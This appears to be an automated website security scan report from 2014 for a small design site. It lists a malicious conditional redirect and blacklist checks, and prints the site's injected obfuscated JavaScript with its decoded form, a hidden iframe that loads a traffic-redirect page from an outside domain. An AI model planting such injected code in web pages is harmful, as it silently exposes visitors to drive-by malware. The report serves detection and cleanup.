Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://hmydesign.ca/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: hmydesign.ca Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 06 Apr 2014 08:05:06 GMT Location: http://avonleephotography.com/zaaf.html?h=643102 Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://hmydesign.ca/ | 200 OK Content-Length: 4845 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v52cf72472e837(v52cf72472e876){ function v52cf72472e8b7 () {var v52cf72472e8f5=16; return v52cf72472e8f5;} return(parseInt(v52cf72472e876,v52cf72472e8b7()));}function v52cf72472e94c(v52cf72472e988){ function v52cf72472ea4b () {var v52cf72472ea88=2; return v52cf72472ea88;} var v52cf72472e9cd='';for(v52cf72472ea0d=0; v52cf72472ea0d<v52cf72472e988.length; v52cf72472ea0d+=v52cf72472ea4b()){ v52cf72472e9cd+=(String.fromCharCode(v52cf72472e837(v52cf72472e988.substr(v52cf72472ea0d, v52cf72472ea4b()))));}return v52cf72472e9cd;} document.write(v52cf72472e94c('3C696672616D65206E616D653D27313562613763646327207372633D27687474703A2F2F616C6C2D74726166662E636F6D2F74722E706870272077696474683D353537206865696768743D333331207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='15ba7cdc' src='http://all-traff.com/tr.php' width=557 height=331 style='display:none'></iframe> Antivirus reports:
| ||
http://freednslock.org/?id=ftp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://freednslock.org/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://91.221.66.125/in.cgi?default | 404 Not Found Content-Length: 204 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hmydesign.ca
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hmydesign.ca/
Result: hmydesign.ca is not infected or malware details are not published yet.
Result: hmydesign.ca is not infected or malware details are not published yet.